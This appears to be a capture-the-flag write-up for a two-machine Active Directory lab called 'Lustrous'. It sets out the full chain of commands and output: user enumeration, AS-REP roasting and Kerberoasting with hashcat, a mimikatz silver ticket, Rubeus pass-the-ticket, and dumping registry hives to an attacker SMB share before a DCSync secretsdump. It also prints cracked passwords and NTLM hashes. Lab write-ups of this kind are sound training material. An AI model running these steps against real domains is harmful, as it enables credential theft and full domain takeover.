Lustrous
Last updated
Last updated
Operating System: Microsoft Windows Server 2022 Standard
Chain: True (2 Machines)
ben.cox
Trinity1
Asreproasting
Domain User
svc_web
iydgTvmujl6f
Kerberoasting
Domain Users + SPN
tony.ward
U_cPVQqEI50i1X
Silver Ticket
Domain User
✅ Valid Usernames
ben.cox
svc_web
tony.ward🔑 Passwords list
Trinity1
iydgTvmujl6f
PVQqEI50i1XNmap Scan
Nmap scan report for 10.10.205.53
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-24 23:10:26Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53990/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53991/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
54030/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
54047/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Nmap scan report for 10.10.205.54
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
FTP Anonymous Enabled
Users found into the FTP server
Not vulnerable to DNS Zone Transfer
Root/Parent Domain
Domain SID: lu
Domain: lustrous.vl
FQDN: LusDC.lustrous.vl
SMB Signing: True (Not vulnerable to NTLM Relay)
Server allows null session authentication
401 Unauthorized indicate the presence of Kerberos authentication
User enumeration revealed valid usernames using statistically-likely-usernames/john.smith.txt
❯ ftp 10.10.205.53
<SNIF>
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21 11:51AM <DIR> ben.cox
12-26-21 11:49AM <DIR> rachel.parker
12-26-21 11:49AM <DIR> tony.ward
12-26-21 11:50AM <DIR> wayne.taylor ❯ /opt/kerbrute/kerbrute userenum -d lustrous.vl --dc 10.10.205.53 /opt/statistically-likely-usernames/john.smith.txt -t 65
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 04/24/25 - Ronnie Flathers @ropnop
2025/04/24 19:16:06 > Using KDC(s):
2025/04/24 19:16:06 > 10.10.205.53:88
2025/04/24 19:16:24 > [+] VALID USERNAME: jeremy.clark@lustrous.vl
2025/04/24 19:16:28 > [+] VALID USERNAME: wayne.taylor@lustrous.vl
2025/04/24 19:16:44 > [+] VALID USERNAME: rachel.parker@lustrous.vl
2025/04/24 19:16:49 > [+] VALID USERNAME: donna.collins@lustrous.vl
2025/04/24 19:16:50 > [+] VALID USERNAME: tony.ward@lustrous.vl
2025/04/24 19:16:56 > [+] VALID USERNAME: ben.cox@lustrous.vl
2025/04/24 19:17:00 > [+] VALID USERNAME: deborah.harris@lustrous.vl
2025/04/24 19:17:01 > [+] VALID USERNAME: tracy.roberts@lustrous.vl
2025/04/24 19:19:52 > [+] VALID USERNAME: michelle.john@lustrous.vl❯ hashcat -m 18200 ben.cox.asreproast /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$ben.cox@lustrous.vl@LUSTROUS.VL:2c3c4f66302bb71d9a6e03b23a681410$adee35575ead0679c058b564d3cd8212d296274a95e73f7cda711efab2a33191e9531c18c19cb6f26c0101ae253969de7c30c1ae60b54436c889b2d260b4baa14ebe0f3b88613f43a70a391fbe00769e1550aed99310b2e579c05615885c7f864c981be53eeede541af71fe284f28f1cc9cc3e7a84164dd373057e7224bf969b80f2bff026465634f327640bf69208f4354e2b5cbc78be22e124269bd3fe772b5d3be32fdbc73e7128201c11f236c91df82a60a69c1bac572d905bf2891d36b38d6876d56672a0eed1f5a58fe5e6fd48edf174dc7c3782b7c4830909ab0b58e55416fa34d133ac3cadc1:Trinity1Valid Credentials: ben.cox:Trinity1
❯ nxc ldap 10.10.205.53 -u 'ben.cox' -p Trinity1 --kerberoast kerberoast.hashes
SMB 10.10.205.53 445 LUSDC [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
LDAP 10.10.205.53 389 LUSDC [+] lustrous.vl\ben.cox:Trinity1
LDAP 10.10.205.53 389 LUSDC Bypassing disabled account krbtgt
LDAP 10.10.205.53 389 LUSDC [*] Total of records returned 4
LDAP 10.10.205.53 389 LUSDC sAMAccountName: svc_web memberOf: pwdLastSet: 2021-12-22 07:46:12.670282 lastLogon:2025-04-24 19:11:22.617108
LDAP 10.10.205.53 389 LUSDC $krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$da8f529fc816f65caabde1b3dbf4e2a4$2106b480be3dc60793c9f42b7ef73c9342491cd23a330190aa4117634902acad72ce64a75bae757f4ad5499555b9d03a42592f53fca25e34a7671347d74fb9e4f77c50b3f2207d3a15f7e7332a33d6f3903dcc7ae8f250f0b8ebabc2e1b7fec2545a462f372a579fb4cfbf4874eb8a97fe2ea0ce2f724a6932f35592205a39bce10160aba0f46746379ed238df509dcdbd58b36625d677a25f28c2067217a75c8cc8cec72b14def9b1aa0315a8c568f21b7946244309707f003ca745e0d5880962fe20fd56e9dc19ac01ee80334799a4c6aab78b4ba5250a09fa6e787683789c8464f013cc26bc482c17762e677856c5ee1b57f329a28b6bffcd80b8dafa2e382a7865942167d58c69ccebdb5774cc3b0c677ed8b59cc05bf4e1eee5085548e540fd4ade2c20f1ac35d430ca5cfdff098c7acbeccfbc339a37f5bdc048b3161f3628f70dfcaabd64faba97e190c13d64b394d62ad8a5a41824987664ebb21d3057678d53ad205ff1dd12d433fa395f2fa84c9963bf22bd4946b56a8b0ed015204b43d827b242aa60882f67500a510cced77f310bf3192e9019dbc8518c307c03882d88a3f2e66b9126d85d3d01cbcacb47a044d87058f0dfe7dfee0b53cb56c302ff6759e1e7050d8b7df6785066458c74a13753faa3db1679e250cea5495fb90c78aa469d7dd5ae01c0008ae4b76558891d4278a93396a8e4e3e06a736012bc6974e98a12fae3b90f093def76467dc3bffa7f2bbf7b5e0074bb07b196d328b258729355ada1259584cd8779735bd4b23ba51d61e45528259ddd8db77783cf9079e7866ab05498557147b212f2fa39afdc27f72836272c7c491ce9da4aad213493adbf04f93893ec16cb7411d5378501c749b49534ad85789eaeb1beedb3a1e187b17c997bc332adb8e23899b41df3e0f8b1085f997c3725f88d94ac0017f05998ee3318579cfa50cfed9851a369debed37980039e5254c67bcbbc48f5f2f948bbe885993db3eb9aa2a98496c44d65f19beb5bf9148bd0b8e1e206c6a3ad1305dbf3da3efbb91c538dfd4ed03e4bfbd731936e4f05db3382b837af593129c57eeed34cb548347a17f92ac4d1d1deffd1303e36b7931ad93c8a778518f4e2adb7b2817a2334d5e3b5d231caf9923c6dd849f3fab02a94c4efb3ecc17e8b46e174c7b34fa3726b5fdfcfba263114c0747da460afe5282264996fdf883a4393dc0d4160530e9b33cbdb40ded4f5ff6ff6050f6db268fb8240ffe76868ff93ca4003effc6d4c5c505e475fa898dbac6ba1f2831a710e1619bf5c0c6552b7252be03626f8c55b70f01d581034aed244bc4ff5d46d8c7096c43c4d6bbde6a6b14673a74a2ad6218248b4c2715d7541e51a24fc73c1ea23b8805b36993230ff02f04479864d97c44dd11eebccd589cc780c8b24a404b183ca110ecc82e1cce8a9d158441f3280
LDAP 10.10.205.53 389 LUSDC sAMAccountName: svc_db memberOf: pwdLastSet: 2021-12-22 07:46:34.170590 lastLogon:<never>
LDAP 10.10.205.53 389 LUSDC $krb5tgs$23$*svc_db$LUSTROUS.VL$lustrous.vl/svc_db*$efcccffe3c3015bc3cca86242387c196$8277be700edbccc3fbab3a27f069cedb3422e176aff7a301633c1f493738cec7e7fc9d4dc4194f972658fbfabf46f967c73b70a476055e9d6faa42c7c5a17d2baa0f87492c2d4d50c8074c4d41e7f3c1a270b0758cda98f3c2c8ca7226734969cea9024981b9b8bff79cd6066815993cac21c45774a7c4fda04fd8859ae2c0281caf6e47bb8993123a621221907fc4a9ef0f9ac81bc630e65fac18d229965dbc70f4e91fd1207267746a87d6b2408cad166bfe50c57d0095b526d28dc97f714666c3ff9f59b05f59245344239417807c33ce1609fbcfeca101a3e3d1531bf95f05f2c959bc51bd8ea77c0a507f628b74c4a5c530fdffd41e523031accc24840e3fdbddae6ae8c07afeb53f51ae78fe557e5a64be4ecd7fe1bd789740ebc534f28ec66b048e997f6199d88c048e6c375fd9e662b94af250fe9c7c8b8c8e6d1252461f8f8bf04424ecbf857d8e846746115a048147bbe8c4cac5e7caf46240ebc36768e0802ae1e212576375dd72036b4bcfc267057e117bf22a0569eeb934938407683080260f2c326edc1e0c6ef953c9a27148af07e0c5d36177fae3b594bf6b0d811aefc7c8e29dd0e6f7b7a696f854a0ecec13d96ca225bd9d9dd63453525ee039d596ad9ddae99e923c35d25508784e28c5a21ae4087aa86e311f8c5ae648dba5e8e0c10f290ac59db5455f8ecb61c8c22de325e3d816b95b327c0ebcb4b4990a3a09d25101e6e47190839cb66c654eb6a5cc83c7f437ce25331fbf978ffdf74fec0b2c0c8e136fdc550b85b729fe0f4f48ab166806dad5cdaa3967cf84fd43f246e357fac9624042931bc8b8999e21566fccad7327bd1c71332389bcdeb87f4da76ca9d20629d0f6a64ab08ca17b209c7604f30420b069fb9eac8e465e82b8e6bc4604f652c4d52eeb453943e475724b9e3822bfacab48f5632eca8131557f5b25d77bd44d25fb19bc474b96172f8bde541fa6a0de44fc950618aa4825a532b5f926d570f217ae26874a1a8439eff2e15988af7d0efa116356978b07a4aa9ce944eb8cd555f6834140673a2ff208f61d8e75135d4e3a5c6efa2005b53213f09d3cf8fb78623b4976d14a2b71b6a8b9f0e2e5f4a3e712bfffef749fcaa0e62a84d041caf8a0e2edf697d16462aadce3647798e6ab2f48a5c6954e81029fc2d7d5b70edaa21f28e6819de295d5946d2bc1d77b87a1a0b82574907f6d3c74d75533b672965225359dbd781711063888c44d09ead1f20570b4d9134102f290416b669789bf8295955a1bbb5e945841d639fd8ccc714cae1221492e0a7d40751915d72f12940cf63ac3b9041b2f8aed5acfac94c8c4da5ca63c666a06afe1e5eb66fe4c72193f317278881cf5efba2854b14f069c34594e0821e0c2143f2d49755502d5ddcdcf7f2df5985b1f27735049437215cd6d20f9382696ef2975c9613808acae❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$d15d33ad313766eb651c4100bd94dd8d$92afc5f7afb008e0bed45da82da0919e9480cdd1c7ba62fd33afdc6b1486ad840e34925e2947df69f71119a8f37539307948e6432f399472631d3a4d45a6275782ee2d55fbc7b44ec271086f339df2245ee1b427c62a7bc40b9b054867792d8e88e16c2d4c920469fff9acdfacad840bbd062f75184fdef1cccd2e28e119e643b18508923300462f6c654d92d08eeebece4fc282ef3670737c751dfbc69f7facf3e1652054a52da44995f6a92a10ed3bd87a2a1e79266552a5f5fcf146c62e133fde4c3d517c87c9e649ba160affcd3ad39df45d8de2765c202e78dfe0e9716058d10d292cfb7a0e1b17dd30e089e4aa56eae9e6e490d98c0acffb2f7f18c41c000aac15491eba844d790b461e4e152c658119fc0ce0bcaf7a857328f8780a1e0a0681418c080d3286603005cff774a04f391d4fdf4f2c1ab8a9c856aa9fbf595e1e8a7b8c9bd5d4c83039556dbdf64409855950f6c52f91df01d04e012386c1b9aa3b1d57cf4c5e17cb59e56dd93b27b753f9e5baf038a8953ab1d9cfdd4e7638119811f46eda3329713c942d363fecd7e21a8e8b1deffa4c1565ad232114f2099e23f7f387dea95dd6c29f615bac1659584239e6bc55e4d89945040679d3375f98f44001a710d97457ecfd110877c5dcc315b5d3c40cfbe830aa6769939422df2df7fc1a5f8539bf50bb11c4da7649ae3c680137c7f7c2992b11ebb0e96f82fc1de96ab5311167ba2de729d36bea07079fd90fd6373b314dcda9393b5fe1c69bb04395de26c288cbb5a292514ef2687f29de0f7dd619959716dba804ec6162b01203b6598cdd509373e9fdb9d6876a7c873cda540afa31cdc3fa2ef2ae1b5ab5cfecb44a6eeba60b7f663ae12ad9bd40c7b71c3fe6d017663e60d626bdd5728ac4f2c6dbb4f5a6cb4e01c6414c49b277dbc1441dde8444926b7913b7ab5bcf7e491560f158a54d28238499f4b02c4514bd78307731a0db0d17f1ee46490427f6959373b400856bb2c2b929121e22d6f29502a44952bec64badc0bd1c812d41bbb6d012f330e9899ec60b675f776a917eca6217642af26d2e0c93b1e413df9a769111117b4de78f9b0e566d01ea8060950b85458762cbe7b9a5ec4b1c603f2c5791c1c1201c35e575c4b5c42bfdd6b3ffd6b0e3c06447bb0ffe7161c19b5e7ca749c2cbeebdb1d90d549bbe3badd32177a05a599ae0d401f43a627e0ff0c6c73d75fd4d53f3fe08edc947b3756d1b69b14a1ca797e172f5f902abc505615b2536d8f54936402bedba1c22866a6682d73a721d45d94a7d00eec8038b7c4beaa3618e5907f462f6e404c9233d4a878eeb1745af8f0a8216cde9d87d6bc2a791ad2f9be991669b340c5962ca08db56194cd50d20ee5aa2d401ceb525da15ec89b1792d4bbcf9716f778127cd43165efa17a82a9ea0ce8f9fe7d21cda75a08dd54bd70468:iydgTvmujl6fValid Credentials: svc_web:iydgTvmujl6f
During the enumeration the tester found a System.Management.Automation.PSCredential object in admin.xml that containing the Administrator credentials encrypted.
The tester used Import-CliXML to obtain the administrator's plain text credentials.
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred = Import-CliXML -Path C:\Users\ben.cox\Desktop\admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred.GetNetworkCredential().username
Administrator
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred.GetNetworkCredential().password
XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> ❯ evil-winrm -i 10.10.205.54 -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Using ben.cox credentials the tester was able to authenticate to the web site using kerberos authentication.
While analyzing BloodHound, the tester discovered a highly valuable target, tony.ward, who is a member of the Backup Operators group. This group allows users to dump the SAM, SYSTEM, and SECURITY registry hives, as well as the NTDS.dit file.
Knowing that, the tester proceeded to use svc_web account and create a silver ticket to access to the application on behalf of tony.ward.
PS C:\Users\Administrator> .\mimikatz.exe privilege::debug "kerberos::golden /domain:lustrous.vl /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /service:HTTP /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /ptt" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # kerberos::golden /domain:lustrous.vl /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /service:HTTP /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /ptt
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service : HTTP
Target : lusdc.lustrous.vl
Lifetime : 4/26/2025 4:52:33 AM ; 4/24/2035 4:52:33 AM ; 4/24/2035 4:52:33 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
mimikatz(commandline) # exit
Bye!PS C:\Users\Administrator> (iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials).Content
<SNIF>
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<SNIF> <tr>
<td>
Password Reminder
</td>
<td>
U_cPVQqEI50i1X
</td>
<td>
lustrous_tony.ward
</td>
<SNIF>
PS C:\Users\Administrator>PS C:\Users\Administrator> .\Rubeus.exe asktgt /domain:lustrous.vl /user:Tony.Ward /rc4:78b83ed65c7286b2a434bdba026244e4 /nowrap /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 78b83ed65c7286b2a434bdba026244e4
[*] Building AS-REQ (w/ preauth) for: 'lustrous.vl\Tony.Ward'
[*] Using domain controller: 10.10.140.229:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFnjCCBZqgAwIBBaEDAgEWooIEtTCCBLFhggStMIIEqaADAgEFoQ0bC0xVU1RST1VTLlZMoiAwHqADAgECoRcwFRsGa3JidGd0GwtsdXN0cm91cy52bKOCBG8wggRroAMCARKhAwIBAqKCBF0EggRZMo0v1quCpiZ3nrLx09abXaRGJvnPpf2+9lgTFMPFzVqgtBV+ejoEu2qfMhooaFmRZns3kqDakWJQnBV8eNWX/GX+j74PqqqhJgBbHy8OQQuqwJi2h3f5AlE8KbQ35X+MlwnwVGCE4YMAjRIcER7ff6gV27uBKaETE8I+GtvQfE5Dror4g7YEnX97UdE4MUV7wpBh+Xxo86KJJIPVyHZa2ha49NiCGQdkF/0uUmTIlE+nlxLiLeaoaJd9OAaQVK3fLHJBZV/BhkXw3VtytFbxx0j+kn0GyN78veMC5Vrpbi8TczzLXUjGRq7/DvNibjw37nC6ZgPIFc+bamVvUaDr46o3egXBDdMo9AqBjNeoj2vM57MYo4xtILExbkBokx5LMU/f/DgKlCqUAjljG/iH7iXtQs9VQ5YUx6uvqpHWsSwm3AfJMB3YoHGh3f1JvPeU1dhHK2zJjACjb6jE/7k8u0KqSffPQAIcoqPQaDKarALzbEReguPXV7ftnHxc28ADx6xRi8eqllmY8vGMfQBUHyLjzEbPEvOEE7LSmzcsgP90IZyGT0T/bc8+TvG+Wdo8Z6NQYDc9sl7+sHRzKjAwZjLaLeYRpZVVe9Pp6rin9gjVOSGzdVpoFmK2fKfTgVCfdZuMbPFcF+sAfQT3YH1Xfu/5KWLIC5/Xld0R92bGU5QXqelx3UyyMByax3T3tGej+qJvjnRefH4GsaPeIky1wx5+S+VvpWvKRYW93tw/LlQNjg0ZHz+0MCAyGM/U/sCj00JADM5327fBlNFhmvL/qZcrS/ezT54tUapiw3n4qgMvXwT3bRQytguE5KuvREoKZPqqOrA7N5kb2LRFCLzUqPE/fCH8Q/ldUOwok5XvMwMMwz09f6he0OivInODhECZ6GGpa54bWLepuygIaofaJez9xbRv/iX15hCVszm4nV4127Mbub7zuDp9xsYldPDKZJD72YLBRGEtEAt5msL96gkyJbnzBIgc1QFKA8BgafycR+yB55PBfBO/4sypkV+sRunRzoAcx6D7IjaISMXUq4z7y54LAe/9AxCXGxsd1t2LjY3a9d3vy+HkMn8YLdh2LqqUGdrHIuG0p12PfxQQ1gbM0Hg2PZZX8w0nwgoCyDIeIBDoHspvd1pV5GRSm0db/7Od8ftDpHcrL6UQmB2otoD5bS28F3m1hVKw5xcfcOO3yju0vQOahI6RlXggXtJC1Qwzpl/EJ6BrsCnLSiBKu6ww9fZFs63r/cqG7aJTCmrZeciLuImwo2I4LKYoPrngdUM0P5qEmDaZSgOMEPjITtQziQSeQ8q1XsoxH7U7IzlWiJRBkTZmGFT3GFFZy5seELW0dy4sJ55zbwzBwHcY21WhQnIvtKnxXPuyYROSD9wsUeqTtMbz232c9Q3Kk+yoWbcfIf1ZxjoVBkjJ7UOcNxihKpvSh/zL3Zxb5zROJHkCWe5jk1qWWF9N6tFSykWNWP/j7GIYJfqno4HUMIHRoAMCAQCigckEgcZ9gcMwgcCggb0wgbowgbegGzAZoAMCARehEgQQSOGhobYVXRTX3r3n2uYuy6ENGwtMVVNUUk9VUy5WTKIWMBSgAwIBAaENMAsbCVRvbnkuV2FyZKMHAwUAQOEAAKURGA8yMDI1MDQyNjA1MDU0M1qmERgPMjAyNTA0MjYxNTA1NDNapxEYDzIwMjUwNTAzMDUwNTQzWqgNGwtMVVNUUk9VUy5WTKkgMB6gAwIBAqEXMBUbBmtyYnRndBsLbHVzdHJvdXMudmw=
[+] Ticket successfully imported!
ServiceName : krbtgt/lustrous.vl
ServiceRealm : LUSTROUS.VL
UserName : Tony.Ward
UserRealm : LUSTROUS.VL
StartTime : 4/26/2025 5:05:43 AM
EndTime : 4/26/2025 3:05:43 PM
RenewTill : 5/3/2025 5:05:43 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : SOGhobYVXRTX3r3n2uYuyw==
ASREP (key) : 78B83ED65C7286B2A434BDBA026244E4PS C:\Users\Administrator> .\BackupOperatorToDA.exe -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -t \\lusdc.lustrous.vl -o \\10.8.5.48\smbfolder\
Making user token
Dumping SAM hive to \\10.8.5.48\smbfolder\SAM
Dumping SYSTEM hive to \\10.8.5.48\smbfolder\SYSTEM
Dumping SECURITY hive to \\10.8.5.48\smbfolder\SECURITY❯ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e10fc3898a203cbc159f559d8183297:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:0981fd4f8fc47444e5e696ca6626c7a336eb220d0534ca23ad6a2bb042f5fdd25e030ce6015fdb518d40685530ab5193ec9272c3513f0f6a0280aed3ef7eaa92c0730a287a2ef933b5c4e870a0233b44b81d35e33efe5d62ae847f84bef14b3fcf57930a49cba029e740800ae4f9721558b913de32531fa5bc89ba06d00748573d0b6935502b24852b8fa2ea74e1def3f6bb1d633f0531a686f61d2f66bf338e0b39d51da37488dd446e3982ed239bcf9395ca463cacd3c695eb0ff09e74f977e792e2cbcf786b5015ad7062de0e39f1a429390e0b843d8fb04a96280b1a28252afa3155c713ac260af165655e7897ec
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fb2c49ead49730d2b4e701c4bd169af4
[*] DPAPI_SYSTEM
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... ❯ impacket-secretsdump -k -no-pass lusdc.lustrous.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8d9c7bd6de2a14237e0eff1afda2476:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:39049058eaa5309ce13788c31fcba8a4:::
lustrous.vl\Deborah.Harris:1104:aad3b435b51404eeaad3b435b51404ee:87009f579ed9bc7dd01c6d369c3f99b8:::
lustrous.vl\Duncan.Spencer:1105:aad3b435b51404eeaad3b435b51404ee:64587f4044d57329db255cbed249ce4e:::
lustrous.vl\Brenda.Andrews:1106:aad3b435b51404eeaad3b435b51404ee:70f159bb0c84242302014ce70a7f5ae6:::
lustrous.vl\Rachel.Parker:1107:aad3b435b51404eeaad3b435b51404ee:924bb1caac4986b7c95097f33336980a:::
lustrous.vl\Wayne.Taylor:1108:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::
lustrous.vl\Hugh.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:46213f1b9d43de00629e338e0b040029:::
lustrous.vl\Tracy.Roberts:1111:aad3b435b51404eeaad3b435b51404ee:b291d04a0d7b6cdb63b46727a38f1b86:::
lustrous.vl\Bradley.Hancock:1113:aad3b435b51404eeaad3b435b51404ee:cbadf75321c9aa0a47b403ef1e0a7c55:::
lustrous.vl\Tony.Ward:1114:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::
lustrous.vl\Joanna.Hall:1115:aad3b435b51404eeaad3b435b51404ee:7837938248efd8b5d6115c8cce33159a:::
lustrous.vl\Marian.Elliott:1116:aad3b435b51404eeaad3b435b51404ee:2663fd84b68f22555d66508b7fddb28e:::
lustrous.vl\Ben.Cox:1117:aad3b435b51404eeaad3b435b51404ee:779041047eed27dc382579f2e9c1bd78:::
lustrous.vl\Joanna.Harvey:1119:aad3b435b51404eeaad3b435b51404ee:000408bc26781f3453c485652fbfcc71:::
lustrous.vl\Jeremy.Clark:1120:aad3b435b51404eeaad3b435b51404ee:46068039554c7592d962ee79e86ed66b:::
lustrous.vl\Allan.Parker:1121:aad3b435b51404eeaad3b435b51404ee:7f6565f779ab0e30a8a89d9563571f5d:::
lustrous.vl\Mitchell.Fuller:1122:aad3b435b51404eeaad3b435b51404ee:ac55b50b2fdc4ecc91c9c511cbf67529:::
lustrous.vl\Colin.Dodd:1123:aad3b435b51404eeaad3b435b51404ee:13416726f488801791d0027da08fd72c:::
lustrous.vl\Liam.Atkinson:1124:aad3b435b51404eeaad3b435b51404ee:dc5248d6c0d804c638674d3ba61a27ad:::
lustrous.vl\Michelle.John:1125:aad3b435b51404eeaad3b435b51404ee:a987c80448f62e33a7ac269bef95e965:::
lustrous.vl\Iain.Evans:1126:aad3b435b51404eeaad3b435b51404ee:625fdd59d5d1b64d5f354a11f8a8d1b0:::
lustrous.vl\Donna.Collins:1127:aad3b435b51404eeaad3b435b51404ee:ada5c99f86d2f40d1e7103cda5647b09:::
lustrous.vl\Cameron.Walsh:1128:aad3b435b51404eeaad3b435b51404ee:7c55400f3da31598559e5227114e59ad:::
lustrous.vl\svc_web:1129:aad3b435b51404eeaad3b435b51404ee:e67af8b3d78df5a02eb0d57b6cb60717:::
lustrous.vl\svc_db:1130:aad3b435b51404eeaad3b435b51404ee:e9e4f101deca969c1b531486554e8400:::
